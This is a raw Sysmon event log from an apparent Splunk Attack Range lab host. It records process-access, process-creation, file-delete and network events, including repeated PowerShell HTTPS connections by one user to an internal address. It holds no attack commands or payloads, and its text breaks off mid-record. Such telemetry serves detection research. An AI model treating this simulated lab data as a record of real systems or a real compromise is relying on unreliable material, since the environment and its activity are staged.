10341000x800000000000000036496793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.636{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.152{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9FBF33845BFFCBB06CACCF8ABEFA6D1,SHA256=5D4A66B6142F371DC136E20B44FBD82E57F0111535751BD423113F60BF8BC158,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.136{B81B27B7-A01F-6140-6756-04000000C801}66046608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:09.900{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3D97AEEA2A21581B5B1F4488C3D51556,SHA256=00030C7559893D4B9EC200E8831A63A1EF904C824733DCBFED344350BA6BDD34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:09.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E8659DB93315B9F0A9879DB6C84BE85,SHA256=2118578B9546F0C59429383D5787B93A30F887788AD9A5588F9982FAA87EC23D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:40.448{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50458-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.779{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50457-false10.0.1.12-8000- 23542300x800000000000000036496799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:10.198{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215CF2C5E9916DCCF4A16CE1866358A3,SHA256=FEC8C2EC76E4FFB590D3923032767DFDBFB2F08F1FFFCBE29D4556F462DC1EE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:11.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471ADEB6FCF638AE699E024226342175,SHA256=7353C3E866D41A2C6C47A859B881BF7AAE573DDA796AD856E418C6AE090C4581,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:12.296{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5393739D1520CD0AE4A08DC95D67CF48,SHA256=32C7D6D5AD7BF5E9D700D67F2E1C76C340D92357D5A8E51DC02201F23129ED81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:13.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=431BCC180D69C99F464F563EE2CD320B,SHA256=56A9816351019815E9AF3673289CC713139560C4367E7D129832FACF42108372,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:14.994{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6241AFF87DA232CD82A084E9A2030897,SHA256=A9389CF4A6C6EAC9F9B7A516542850DAE1C792A8EF5E5DB4E936909D7436B0A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:14.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81F9369C5F40CD689ABA48A943DF5CEA,SHA256=0E01F524F5EB83E446EE91E01CDCA7E199D92D92E7A3079748D2994928123F98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:15.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DF8A8F3CC1988B382FA7782581C13F5,SHA256=F9A5297B2F4C857C13113C5CC432808BA5BB55223B1B6788D05B7B897EA9EE8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.458{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50459-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:16.429{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C17E36E1334E76161991E6881D120C1A,SHA256=FDD632EC4E0AB4F83B662722BEC7CCE89CD0352CC268EE77894605A950FDA27D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.794{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50460-false10.0.1.12-8000- 23542300x800000000000000036496811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:17.444{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E5518ABD356DDEDCCCDB9F922AD2425,SHA256=FFE6E3CC4DB2E50CAEBFBEE4B75684ACB45EA1A3A47CBF79DFE1CD56CD22E9A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:18.493{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07C66A0719F586456E036395308E718,SHA256=6051EA6245BB1DD36D2051C6DF96CD526F55CE4EF3C16FB506AB15102FA355A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:19.511{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CA2141F513B80ACA3C5DE04FA7BB2A8,SHA256=344E0D2E185D25A8C3858E104B6C0BD5E6932AF1E5CDDD17B6CCA522BF15F4BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:20.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7F57AA8B2FFB09C61B38D38E4E531337,SHA256=55F884A129BFD4FDC0EE056681D1E3CD63DAC224A6EAF39CCBAEDC67E92A8960,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:20.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332C2158F23EA115BD450B48C8E5C5F7,SHA256=5FFB37010A07BD66693D62718E0CAF0523BD863A0B1ACE5C9A1ECFFF531431F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:21.540{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=068084D593D4B390F5DE07CF155D5E02,SHA256=138D3485A9910BD2D831A1BA13392E6D8F5FA9C9F9C6F1BB51074A8BDB217CFB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:51.471{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50461-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:22.589{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28546E9FCE10A13279ED8C6A03E0A26B,SHA256=231B81CA82BD1B4ABD331920EABF0AF9DACA3B0735A0495663C43D967C88F1CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:51.823{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50462-false10.0.1.12-8000- 23542300x800000000000000036496821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:23.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D7970AD0F47A08ACB51712A11A7CAC,SHA256=912A33631D49697EFD98F945956A993F94BBA1182F0002743BE0EC17033DBDDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:23.224{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=76BCF1D8CBE48381C381EC66D4F8564C,SHA256=CFBAC7333099511617852B19045704ED6DA526920125C7A964DD272DA2BD3E4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.923{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E7B589855F230766DAF88FDC2AB8B798,SHA256=9347623EAA61C261A486D63EB96EEB4F521812B6A6153B3BADE19C8447592A07,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program 